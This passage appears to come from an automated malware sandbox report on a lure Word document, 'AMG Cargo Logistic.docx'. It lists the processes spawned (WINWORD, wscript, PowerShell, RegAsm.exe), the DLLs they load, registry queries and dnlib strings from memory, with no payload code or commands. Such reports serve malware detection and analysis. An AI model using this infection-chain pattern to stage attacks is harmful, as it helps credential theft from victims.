                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: AMG Cargo Logistic.LNK.0.drLNK file: ..\..\..\..\..\Desktop\AMG Cargo Logistic.docx
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/media/image4.emf
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/media/image3.emf
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/media/image2.emf
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.442998706.0000000002160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.442998706.0000000002160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
